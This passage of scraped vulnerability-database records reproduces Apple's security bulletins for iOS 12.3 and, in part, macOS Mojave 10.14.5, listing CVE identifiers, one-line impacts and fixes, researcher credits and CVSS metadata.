Florida\n\n**Mail**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Processing a maliciously crafted message may lead to a denial of service\n\nDescription: An input validation issue was addressed with improved input validation.\n\nCVE-2019-8626: Natalie Silvanovich of Google Project Zero\n\n**Mail Message Framework**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: A remote attacker may be able to cause arbitrary code execution\n\nDescription: A use after free issue was addressed with improved memory management.\n\nCVE-2019-8613: Natalie Silvanovich of Google Project Zero\n\n**Messages**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: A remote attacker may be able to cause a system denial of service\n\nDescription: An input validation issue was addressed with improved input validation.\n\nCVE-2019-8573: Natalie Silvanovich of Google Project Zero\n\nEntry added July 3, 2019\n\n**Messages**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Processing a maliciously crafted message may lead to a denial of service\n\nDescription: An input validation issue was addressed with improved input validation.\n\nCVE-2019-8664: Natalie Silvanovich of Google Project Zero\n\nEntry added July 3, 2019\n\n**Messages**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Users removed from an iMessage conversation may still be able to alter state\n\nDescription: A logic issue was addressed with improved state management.\n\nCVE-2019-8631: Jamie Bishop of Dynastic\n\nEntry added August 1, 2019\n\n**MobileInstallation**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: A local user may be able to modify protected parts of the file system\n\nDescription: A validation issue existed in the handling of symlinks. This issue was addressed with improved validation of symlinks.\n\nCVE-2019-8568: Dany Lisiansky (@DanyL931)\n\n**MobileLockdown**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: A malicious application may be able to gain root privileges\n\nDescription: An input validation issue was addressed with improved input validation.\n\nCVE-2019-8637: Dany Lisiansky (@DanyL931)\n\n**Photos Storage**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: A sandboxed process may be able to circumvent sandbox restrictions\n\nDescription: An access issue was addressed with additional sandbox restrictions.\n\nCVE-2019-8617: an anonymous researcher\n\n**SQLite**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: An input validation issue was addressed with improved memory handling.\n\nCVE-2019-8577: Omer Gull of Checkpoint Research\n\n**SQLite**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: A maliciously crafted SQL query may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed with improved input validation.\n\nCVE-2019-8600: Omer Gull of Checkpoint Research\n\n**SQLite**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: A malicious application may be able to read restricted memory\n\nDescription: An input validation issue was addressed with improved input validation.\n\nCVE-2019-8598: Omer Gull of Checkpoint Research\n\n**SQLite**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: A malicious application may be able to elevate privileges\n\nDescription: A memory corruption issue was addressed by removing the vulnerable code.\n\nCVE-2019-8602: Omer Gull of Checkpoint Research\n\n**Status Bar**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: The lock screen may show a locked icon after unlocking\n\nDescription: The issue was addressed with improved UI handling.\n\nCVE-2019-8630: Jon M. Morlan\n\n**StreamingZip**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: A local user may be able to modify protected parts of the file system\n\nDescription: A validation issue existed in the handling of symlinks. This issue was addressed with improved validation of symlinks.\n\nCVE-2019-8568: Dany Lisiansky (@DanyL931)\n\n**sysdiagnose**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: The issue was addressed with improved permissions logic.\n\nCVE-2019-8574: Dayton Pidhirney (@_watbulb) of Seekintoo (@seekintoo)\n\nEntry updated February 3, 2020\n\n**WebKit**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Processing maliciously crafted web content may result in the disclosure of process memory\n\nDescription: An out-of-bounds read was addressed with improved input validation.\n\nCVE-2019-8607: Junho Jang and Hanul Choi of LINE Security Team\n\n**WebKit**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2019-6237: G. Geshev working with Trend Micro Zero Day Initiative, Liu Long of Qihoo 360 Vulcan Team\n\nCVE-2019-8571: 01 working with Trend Micro's Zero Day Initiative\n\nCVE-2019-8583: sakura of Tencent Xuanwu Lab, jessica (@babyjess1ca_) of Tencent Keen Lab, and dwfault working at ADLab of Venustech\n\nCVE-2019-8584: G. Geshev of MWR Labs working with Trend Micro Zero Day Initiative\n\nCVE-2019-8586: an anonymous researcher\n\nCVE-2019-8587: G. Geshev working with Trend Micro Zero Day Initiative\n\nCVE-2019-8594: Suyoung Lee and Sooel Son of KAIST Web Security &amp; Privacy Lab and HyungSeok Han and Sang Kil Cha of KAIST SoftSec Lab\n\nCVE-2019-8595: G. Geshev from MWR Labs working with Trend Micro Zero Day Initiative\n\nCVE-2019-8596: Wen Xu of SSLab at Georgia Tech\n\nCVE-2019-8597: 01 working with Trend Micro Zero Day Initiative\n\nCVE-2019-8601: Fluoroacetate working with Trend Micro's Zero Day Initiative\n\nCVE-2019-8608: G. Geshev working with Trend Micro Zero Day Initiative\n\nCVE-2019-8609: Wen Xu of SSLab, Georgia Tech\n\nCVE-2019-8610: Anonymous working with Trend Micro Zero Day Initiative\n\nCVE-2019-8611: Samuel Gro\u00df of Google Project Zero\n\nCVE-2019-8615: G. Geshev from MWR Labs working with Trend Micro's Zero Day Initiative\n\nCVE-2019-8619: Wen Xu of SSLab at Georgia Tech and Hanqing Zhao of Chaitin Security Research Lab\n\nCVE-2019-8622: Samuel Gro\u00df of Google Project Zero\n\nCVE-2019-8623: Samuel Gro\u00df of Google Project Zero\n\nCVE-2019-8628: Wen Xu of SSLab at Georgia Tech and Hanqing Zhao of Chaitin Security Research Lab\n\n**Wi-Fi**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An attacker in a privileged network position can modify driver state\n\nDescription: A logic issue was addressed with improved state management.\n\nCVE-2019-8612: Milan Stute of Secure Mobile Networking Lab at Technische Universit\u00e4t Darmstadt\n\nEntry added May 30, 2019\n\n**Wi-Fi**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: A device may be passively tracked by its Wi-Fi MAC address\n\nDescription: A user privacy issue was addressed by removing the broadcast MAC address.\n\nCVE-2019-8620: David Kreitschmann and Milan Stute of Secure Mobile Networking Lab at Technische Universit\u00e4t Darmstadt\n\n\n\n## Additional recognition\n\n**Clang**\n\nWe would like to acknowledge Brandon Azad of Google Project Zero for their assistance.\n\n**CoreAudio**\n\nWe would like to acknowledge riusksk of VulWar Corp working with Trend Micro's Zero Day Initiative for their assistance.\n\nEntry added July 25, 2019\n\n**CoreFoundation**\n\nWe would like to acknowledge m4bln, Xiangqian Zhang, Huiming Liu of Tencent's Xuanwu Lab, Vozzie and Rami for their assistance.\n\nEntry updated May 30, 2019\n\n**Kernel**\n\nWe would like to acknowledge Denis Kopyrin, Brandon Azad of Google Project Zero for their assistance.\n\nEntry updated May 30, 2019\n\n**MediaLibrary**\n\nWe would like to acknowledge Angel Ramirez and Min (Spark) Zheng, Xiaolong Bai of Alibaba Inc. for their assistance.\n\n**MobileInstallation**\n\nWe would like to acknowledge Yi\u011fit Can YILMAZ (@yilmazcanyigit) for their assistance.\n\n**Safari**\n\nWe would like to acknowledge Ben Guild (@benguild) for their assistance.\n", "edition": 4, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-07-27T08:18:28", "title": "About the security content of iOS 12.3 - Apple Support", "type": "apple", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-8568", "CVE-2019-8608", "CVE-2019-8633", "CVE-2019-8630", "CVE-2019-8610", "CVE-2019-8584", "CVE-2019-8593", "CVE-2019-8577", "CVE-2019-8612", "CVE-2019-8592", "CVE-2019-8591", "CVE-2019-8586", "CVE-2019-8587", "CVE-2019-8602", "CVE-2019-8637", "CVE-2019-8560", "CVE-2019-8594", "CVE-2019-8585", "CVE-2019-8622", "CVE-2019-8611", "CVE-2019-8601", "CVE-2019-8620", "CVE-2019-8607", "CVE-2019-6237", "CVE-2019-8583", "CVE-2019-8596", "CVE-2019-8582", "CVE-2019-8619", "CVE-2019-8631", "CVE-2019-8615", "CVE-2019-8617", "CVE-2019-8626", "CVE-2019-8571", "CVE-2019-2102", "CVE-2019-8573", "CVE-2019-8598", "CVE-2019-8600", "CVE-2019-8597", "CVE-2019-8628", "CVE-2019-8574", "CVE-2019-8599", "CVE-2019-8623", "CVE-2019-8613", "CVE-2019-8576", "CVE-2019-8609", "CVE-2019-8664", "CVE-2019-8595"], "modified": "2020-07-27T08:18:28", "id": "APPLE:HT210118", "href": "https://support.apple.com/kb/HT210118", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-19T19:30:25", "description": "# About the security content of iOS 12.3\n\nThis document describes the security content of iOS 12.3.\n\n## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page.\n\n\n\n## iOS 12.3\n\nReleased May 13, 2019\n\n**AppleFileConduit**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2019-8593: Dany Lisiansky (@DanyL931)\n\n**Bluetooth**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Due to a misconfiguration in the Bluetooth pairing protocols of a Bluetooth Low Energy (BLE) version of FIDO Security Keys it may be possible for an attacker with physical proximity to be able to intercept Bluetooth traffic during pairing\n\nDescription: This issue was addressed by disabling accessories with insecure Bluetooth connections. Customers using the Bluetooth Low Energy (BLE) version of the Titan Security Key by Google should review Android\u2019s June Bulletins and Google\u2019s advisory and take appropriate action.\n\nCVE-2019-2102: Matt Beaver and Erik Peterson of Microsoft Corp.\n\nEntry added September 17, 2019\n\n**Contacts**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: A malicious application may be able to read restricted memory\n\nDescription: An input validation issue was addressed with improved input validation.\n\nCVE-2019-8598: Omer Gull of Checkpoint Research\n\n**CoreAudio**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Processing a maliciously crafted movie file may lead to arbitrary code execution\n\nDescription: An out-of-bounds read was addressed with improved input validation.\n\nCVE-2019-8585: riusksk of VulWar Corp working with Trend Micro's Zero Day Initiative\n\n**CoreAudio**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Processing a maliciously crafted audio file may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed with improved error handling.\n\nCVE-2019-8592: riusksk of VulWar Corp working with Trend Micro's Zero Day Initiative\n\nEntry added August 1, 2019\n\n**CoreText**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Processing a maliciously crafted font may result in the disclosure of process memory\n\nDescription: An out-of-bounds read was addressed with improved bounds checking.\n\nCVE-2019-8582: riusksk of VulWar Corp working with Trend Micro's Zero Day Initiative\n\nEntry added July 25, 2019\n\n**Disk Images**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to read restricted memory\n\nDescription: A validation issue was addressed with improved input sanitization.\n\nCVE-2019-8560: Nikita Pupyshev of Bauman Moscow State Technological University\n\nEntry updated May 30, 2019\n\n**Kernel**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to read restricted memory\n\nDescription: A validation issue was addressed with improved input sanitization.\n\nCVE-2019-8633: Zhuo Liang of Qihoo 360 Vulcan Team\n\nEntry added September 17, 2019\n\n**Kernel**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: A local user may be able to cause unexpected system termination or read kernel memory\n\nDescription: An out-of-bounds read was addressed with improved bounds checking.\n\nCVE-2019-8576: Brandon Azad of Google Project Zero, Junho Jang and Hanul Choi of LINE Security Team\n\nEntry updated May 30, 2019\n\n**Kernel**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to cause unexpected system termination or write kernel memory\n\nDescription: A type confusion issue was addressed with improved memory handling.\n\nCVE-2019-8591: Ned Williamson working with Google Project Zero\n\n**Lock Screen**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: A person with physical access to an iOS device may be able to see the email address used for iTunes\n\nDescription: A logic issue was addressed with improved restrictions.\n\nCVE-2019-8599: Jeremy Pe\u00f1a-Lopez (aka Radio) of the University of North Florida\n\n**Mail**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Processing a maliciously crafted message may lead to a denial of service\n\nDescription: An input validation issue was addressed with improved input validation.\n\nCVE-2019-8626: natashenka of Google Project Zero\n\n**Mail Message Framework**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: A remote attacker may be able to cause arbitrary code execution\n\nDescription: A use after free issue was addressed with improved memory management.\n\nCVE-2019-8613: natashenka of Google Project Zero\n\n**Messages**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: A remote attacker may be able to cause a system denial of service\n\nDescription: An input validation issue was addressed with improved input validation.\n\nCVE-2019-8573: natashenka of Google Project Zero\n\nEntry added July 3, 2019\n\n**Messages**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Processing a maliciously crafted message may lead to a denial of service\n\nDescription: An input validation issue was addressed with improved input validation.\n\nCVE-2019-8664: natashenka of Google Project Zero\n\nEntry added July 3, 2019\n\n**Messages**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Users removed from an iMessage conversation may still be able to alter state\n\nDescription: A logic issue was addressed with improved state management.\n\nCVE-2019-8631: Jamie Bishop of Dynastic\n\nEntry added August 1, 2019\n\n**MobileInstallation**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: A local user may be able to modify protected parts of the file system\n\nDescription: A validation issue existed in the handling of symlinks. This issue was addressed with improved validation of symlinks.\n\nCVE-2019-8568: Dany Lisiansky (@DanyL931)\n\n**MobileLockdown**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: A malicious application may be able to gain root privileges\n\nDescription: An input validation issue was addressed with improved input validation.\n\nCVE-2019-8637: Dany Lisiansky (@DanyL931)\n\n**Photos Storage**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: A sandboxed process may be able to circumvent sandbox restrictions\n\nDescription: An access issue was addressed with additional sandbox restrictions.\n\nCVE-2019-8617: an anonymous researcher\n\n**SQLite**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: An input validation issue was addressed with improved memory handling.\n\nCVE-2019-8577: Omer Gull of Checkpoint Research\n\n**SQLite**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: A maliciously crafted SQL query may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed with improved input validation.\n\nCVE-2019-8600: Omer Gull of Checkpoint Research\n\n**SQLite**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: A malicious application may be able to read restricted memory\n\nDescription: An input validation issue was addressed with improved input validation.\n\nCVE-2019-8598: Omer Gull of Checkpoint Research\n\n**SQLite**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: A malicious application may be able to elevate privileges\n\nDescription: A memory corruption issue was addressed by removing the vulnerable code.\n\nCVE-2019-8602: Omer Gull of Checkpoint Research\n\n**Status Bar**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: The lock screen may show a locked icon after unlocking\n\nDescription: The issue was addressed with improved UI handling.\n\nCVE-2019-8630: Jon M. Morlan\n\n**StreamingZip**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: A local user may be able to modify protected parts of the file system\n\nDescription: A validation issue existed in the handling of symlinks. This issue was addressed with improved validation of symlinks.\n\nCVE-2019-8568: Dany Lisiansky (@DanyL931)\n\n**sysdiagnose**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: The issue was addressed with improved permissions logic.\n\nCVE-2019-8574: Dayton Pidhirney (@_watbulb) of Seekintoo (@seekintoo)\n\nEntry updated February 3, 2020\n\n**WebKit**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Processing maliciously crafted web content may result in the disclosure of process memory\n\nDescription: An out-of-bounds read was addressed with improved input validation.\n\nCVE-2019-8607: Junho Jang and Hanul Choi of LINE Security Team\n\n**WebKit**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2019-6237: G. Geshev working with Trend Micro Zero Day Initiative, Liu Long of Qihoo 360 Vulcan Team\n\nCVE-2019-8571: 01 working with Trend Micro's Zero Day Initiative\n\nCVE-2019-8583: sakura of Tencent Xuanwu Lab, jessica (@babyjess1ca_) of Tencent Keen Lab, and dwfault working at ADLab of Venustech\n\nCVE-2019-8584: G. Geshev of MWR Labs working with Trend Micro Zero Day Initiative\n\nCVE-2019-8586: an anonymous researcher\n\nCVE-2019-8587: G. Geshev working with Trend Micro Zero Day Initiative\n\nCVE-2019-8594: Suyoung Lee and Sooel Son of KAIST Web Security &amp; Privacy Lab and HyungSeok Han and Sang Kil Cha of KAIST SoftSec Lab\n\nCVE-2019-8595: G. Geshev from MWR Labs working with Trend Micro Zero Day Initiative\n\nCVE-2019-8596: Wen Xu of SSLab at Georgia Tech\n\nCVE-2019-8597: 01 working with Trend Micro Zero Day Initiative\n\nCVE-2019-8601: Fluoroacetate working with Trend Micro's Zero Day Initiative\n\nCVE-2019-8608: G. Geshev working with Trend Micro Zero Day Initiative\n\nCVE-2019-8609: Wen Xu of SSLab, Georgia Tech\n\nCVE-2019-8610: Anonymous working with Trend Micro Zero Day Initiative\n\nCVE-2019-8611: Samuel Gro\u00df of Google Project Zero\n\nCVE-2019-8615: G. Geshev from MWR Labs working with Trend Micro's Zero Day Initiative\n\nCVE-2019-8619: Wen Xu of SSLab at Georgia Tech and Hanqing Zhao of Chaitin Security Research Lab\n\nCVE-2019-8622: Samuel Gro\u00df of Google Project Zero\n\nCVE-2019-8623: Samuel Gro\u00df of Google Project Zero\n\nCVE-2019-8628: Wen Xu of SSLab at Georgia Tech and Hanqing Zhao of Chaitin Security Research Lab\n\n**Wi-Fi**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An attacker in a privileged network position can modify driver state\n\nDescription: A logic issue was addressed with improved state management.\n\nCVE-2019-8612: Milan Stute of Secure Mobile Networking Lab at Technische Universit\u00e4t Darmstadt\n\nEntry added May 30, 2019\n\n**Wi-Fi**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: A device may be passively tracked by its Wi-Fi MAC address\n\nDescription: A user privacy issue was addressed by removing the broadcast MAC address.\n\nCVE-2019-8620: David Kreitschmann and Milan Stute of Secure Mobile Networking Lab at Technische Universit\u00e4t Darmstadt\n\n\n\n## Additional recognition\n\n**Clang**\n\nWe would like to acknowledge Brandon Azad of Google Project Zero for their assistance.\n\n**CoreAudio**\n\nWe would like to acknowledge riusksk of VulWar Corp working with Trend Micro's Zero Day Initiative for their assistance.\n\nEntry added July 25, 2019\n\n**CoreFoundation**\n\nWe would like to acknowledge m4bln, Xiangqian Zhang, Huiming Liu of Tencent's Xuanwu Lab, Vozzie and Rami for their assistance.\n\nEntry updated May 30, 2019\n\n**Kernel**\n\nWe would like to acknowledge Denis Kopyrin, Brandon Azad of Google Project Zero for their assistance.\n\nEntry updated May 30, 2019\n\n**MediaLibrary**\n\nWe would like to acknowledge Angel Ramirez and Min (Spark) Zheng, Xiaolong Bai of Alibaba Inc. for their assistance.\n\n**MobileInstallation**\n\nWe would like to acknowledge Yi\u011fit Can YILMAZ (@yilmazcanyigit) for their assistance.\n\n**Safari**\n\nWe would like to acknowledge Ben Guild (@benguild) for their assistance.\n\nInformation about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. [Contact the vendor](<http://support.apple.com/kb/HT2693>) for additional information.\n\nPublished Date: March 05, 2021\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-05-13T00:00:00", "type": "apple", "title": "About the security content of iOS 12.3", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-2102", "CVE-2019-6237", "CVE-2019-8560", "CVE-2019-8568", "CVE-2019-8571", "CVE-2019-8573", "CVE-2019-8574", "CVE-2019-8576", "CVE-2019-8577", "CVE-2019-8582", "CVE-2019-8583", "CVE-2019-8584", "CVE-2019-8585", "CVE-2019-8586", "CVE-2019-8587", "CVE-2019-8591", "CVE-2019-8592", "CVE-2019-8593", "CVE-2019-8594", "CVE-2019-8595", "CVE-2019-8596", "CVE-2019-8597", "CVE-2019-8598", "CVE-2019-8599", "CVE-2019-8600", "CVE-2019-8601", "CVE-2019-8602", "CVE-2019-8607", "CVE-2019-8608", "CVE-2019-8609", "CVE-2019-8610", "CVE-2019-8611", "CVE-2019-8612", "CVE-2019-8613", "CVE-2019-8615", "CVE-2019-8617", "CVE-2019-8619", "CVE-2019-8620", "CVE-2019-8622", "CVE-2019-8623", "CVE-2019-8626", "CVE-2019-8628", "CVE-2019-8630", "CVE-2019-8631", "CVE-2019-8633", "CVE-2019-8637", "CVE-2019-8664"], "modified": "2019-05-13T00:00:00", "id": "APPLE:44EB82A038A5905A4FF1CA22BF548D8A", "href": "https://support.apple.com/kb/HT210118", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-14T04:14:08", "description": "# About the security content of macOS Mojave 10.14.5, Security Update 2019-003 High Sierra, Security Update 2019-003 Sierra\n\nThis document describes the security content of macOS Mojave 10.14.5, Security Update 2019-003 High Sierra, Security Update 2019-003 Sierra.\n\n## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page.\n\n\n\n## macOS Mojave 10.14.5, Security Update 2019-003 High Sierra, Security Update 2019-003 Sierra\n\nReleased May 13, 2019\n\n**Accessibility Framework**\n\nAvailable for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6, macOS Mojave 10.14.4\n\nImpact: An application may be able to read restricted memory\n\nDescription: A validation issue was addressed with improved input sanitization.\n\nCVE-2019-8603: Phoenhex and qwerty (@_niklasb, @qwertyoruiopz, @bkth_) working with Trend Micro's Zero Day Initiative\n\n**AMD**\n\nAvailable for: macOS Mojave 10.14.4\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2019-8635: Lilang Wu and Moony Li of TrendMicro Mobile Security Research Team working with Trend Micro's Zero Day Initiative\n\n**Application Firewall**\n\nAvailable for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6, macOS Mojave 10.14.4\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A logic issue was addressed with improved restrictions.\n\nCVE-2019-8590: The UK\u2019s National Cyber Security Centre (NCSC)\n\n**Archive Utility**\n\nAvailable for: macOS Mojave 10.14.4\n\nImpact: A sandboxed process may be able to circumvent sandbox restrictions\n\nDescription: A logic issue was addressed with improved validation.\n\nCVE-2019-8640: Ash Fox of Fitbit Product Security\n\nEntry added August 1, 2019\n\n**Bluetooth**\n\nAvailable for: macOS Mojave 10.14.4\n\nImpact: Due to a misconfiguration in the Bluetooth pairing protocols of a Bluetooth Low Energy (BLE) version of FIDO Security Keys it may be possible for an attacker with physical proximity to be able to intercept Bluetooth traffic during pairing\n\nDescription: This issue was addressed by disabling accessories with insecure Bluetooth connections. Customers using the Bluetooth Low Energy (BLE) version of the Titan Security Key by Google should review Android\u2019s June Bulletins and Google\u2019s advisory and take appropriate action.\n\nCVE-2019-2102: Matt Beaver and Erik Peterson of Microsoft Corp.\n\nEntry added September 17, 2019\n\n**CoreAudio**\n\nAvailable for: macOS Sierra 10.12.6, macOS Mojave 10.14.4, macOS High Sierra 10.13.6\n\nImpact: Processing a maliciously crafted audio file may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed with improved error handling.\n\nCVE-2019-8592: riusksk of VulWar Corp working with Trend Micro's Zero Day Initiative\n\nEntry updated October 8, 2019\n\n**CoreAudio**\n\nAvailable for: macOS Mojave 10.14.4\n\nImpact: Processing a maliciously crafted movie file may lead to arbitrary code execution\n\nDescription: An out-of-bounds read was addressed with improved input validation.\n\nCVE-2019-8585: riusksk of VulWar Corp working with Trend Micro's Zero Day Initiative\n\n**CoreText**\n\nAvailable for: macOS Mojave 10.14.4\n\nImpact: Processing a maliciously crafted font may result in the disclosure of process memory\n\nDescription: An out-of-bounds read was addressed with improved bounds checking.\n\nCVE-2019-8582: riusksk of VulWar Corp working with Trend Micro's Zero Day Initiative\n\nEntry added July 25, 2019\n\n**DesktopServices**\n\nAvailable for: macOS Mojave 10.14.4\n\nImpact: A malicious application may bypass Gatekeeper checks\n\nDescription: This issue was addressed with improved checks.\n\nCVE-2019-8589: Andreas Clementi, Stefan Haselwanter, and Peter Stelzhammer of AV-Comparatives\n\n**Disk Images**\n\nAvailable for: macOS Sierra 10.12.6, macOS Mojave 10.14.4, macOS High Sierra 10.13.6\n\nImpact: An application may be able to read restricted memory\n\nDescription: A validation issue was addressed with improved input sanitization.\n\nCVE-2019-8560: Nikita Pupyshev of Bauman Moscow State Technological University\n\nEntry updated May 14, 2019\n\n**EFI**\n\nAvailable for: macOS Mojave 10.14.4\n\nImpact: A user may be unexpectedly logged in to another user\u2019s account\n\nDescription: An authentication issue was addressed with improved state management.\n\nCVE-2019-8634: Jenny Sprenger and Maik Hoepfel\n\n**Intel Graphics Driver**\n\nAvailable for: macOS Mojave 10.14.4\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: A memory 